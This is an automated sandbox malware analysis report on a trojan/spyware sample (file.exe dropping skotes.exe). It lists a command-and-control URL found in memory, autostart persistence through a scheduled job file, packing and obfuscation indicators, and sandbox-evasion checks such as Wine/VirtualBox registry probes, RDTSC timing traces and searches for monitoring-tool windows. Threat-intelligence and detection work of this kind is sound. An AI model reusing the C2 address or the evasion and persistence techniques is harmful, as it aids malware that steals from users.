Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZ
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedH
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedo
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpp
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00768860 5_2_00768860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00767049 5_2_00767049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_007678BB 5_2_007678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0072E530 5_2_0072E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00762D10 5_2_00762D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00724DE0 5_2_00724DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_007631A8 5_2_007631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00724B30 5_2_00724B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00757F36 5_2_00757F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0076779B 5_2_0076779B
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9983874744550408
Source: file.exe Static PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983874744550408
Source: skotes.exe.0.dr Static PE information: Section: hockpqtz ZLIB complexity 0.9949597149776453
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1922048 > 1048576
Source: file.exe Static PE information: Raw size of hockpqtz is bigger than: 0x100000 < 0x1a3600

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hockpqtz:EW;wxulotut:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1dbb1f should be: 0x1dfa51
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hockpqtz
Source: file.exe Static PE information: section name: wxulotut
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: hockpqtz
Source: skotes.exe.0.dr Static PE information: section name: wxulotut
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0073D91C push ecx; ret 5_2_0073D92F
Source: file.exe Static PE information: section name: entropy: 7.988291086573797
Source: file.exe Static PE information: section name: hockpqtz entropy: 7.955305476537546
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.988291086573797
Source: skotes.exe.0.dr Static PE information: section name: hockpqtz entropy: 7.955305476537546
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5C87 second address: 6E5CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5CA8 second address: 6E5CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD0F8CDABF9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FD0F8CDABF0h 0x00000019 jmp 00007FD0F8CDABEAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CBEF1 second address: 6CBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8E1A7A6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4C19 second address: 6E4C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4DA1 second address: 6E4DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4DA5 second address: 6E4DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4DAB second address: 6E4DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 jmp 00007FD0F8E1A7B4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4F5E second address: 6E4F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E520A second address: 6E5227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007FD0F8E1A7A6h 0x0000000c popad 0x0000000d jmp 00007FD0F8E1A7ADh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9456 second address: 6E94CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FD0F8CDABECh 0x0000000f popad 0x00000010 add dword ptr [esp], 0F2EE646h 0x00000017 jnl 00007FD0F8CDABF2h 0x0000001d jmp 00007FD0F8CDABECh 0x00000022 push 00000003h 0x00000024 xor edx, dword ptr [ebp+122D2DCCh] 0x0000002a push 00000000h 0x0000002c mov edi, dword ptr [ebp+122D29F3h] 0x00000032 push 00000003h 0x00000034 mov edi, dword ptr [ebp+122D215Eh] 0x0000003a push B0800926h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD0F8CDABF2h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9599 second address: 6E9648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 popad 0x0000000a add dword ptr [esp], 06A0303Ch 0x00000011 mov edi, dword ptr [ebp+122D2C23h] 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD0F8E1A7A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FD0F8E1A7B9h 0x00000038 push 00000000h 0x0000003a sub ecx, dword ptr [ebp+122D2A4Fh] 0x00000040 push edx 0x00000041 mov cx, bx 0x00000044 pop edi 0x00000045 push 00000003h 0x00000047 mov edx, dword ptr [ebp+122D2A2Fh] 0x0000004d jmp 00007FD0F8E1A7B9h 0x00000052 call 00007FD0F8E1A7A9h 0x00000057 push edi 0x00000058 push ecx 0x00000059 jmp 00007FD0F8E1A7ADh 0x0000005e pop ecx 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9648 second address: 6E9665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9665 second address: 6E96AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jp 00007FD0F8E1A7BFh 0x00000014 jmp 00007FD0F8E1A7B9h 0x00000019 mov eax, dword ptr [eax] 0x0000001b jne 00007FD0F8E1A7AAh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E96AE second address: 6E96DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov ch, dh 0x0000000f mov esi, dword ptr [ebp+122D2CA3h] 0x00000015 lea ebx, dword ptr [ebp+1245E2E3h] 0x0000001b mov dword ptr [ebp+122D2253h], eax 0x00000021 or dword ptr [ebp+122D17D3h], eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E974E second address: 6E9752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9752 second address: 6E9798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+122D2DDCh], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FD0F8CDABE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 and ecx, dword ptr [ebp+122D2B6Bh] 0x0000002f push 91B8962Bh 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007FD0F8CDABEBh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9798 second address: 6E979D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E979D second address: 6E9808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6E476A55h 0x00000010 mov dword ptr [ebp+122D2DCCh], edx 0x00000016 push 00000003h 0x00000018 mov edi, 009CFDF6h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FD0F8CDABF9h 0x00000025 pop edx 0x00000026 pop ecx 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D2C47h] 0x0000002f push A3ED00D1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD0F8CDABF3h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9808 second address: 6E980E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAE79 second address: 6FAE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707086 second address: 70708B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70708B second address: 707091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707091 second address: 70709A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70709A second address: 7070A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
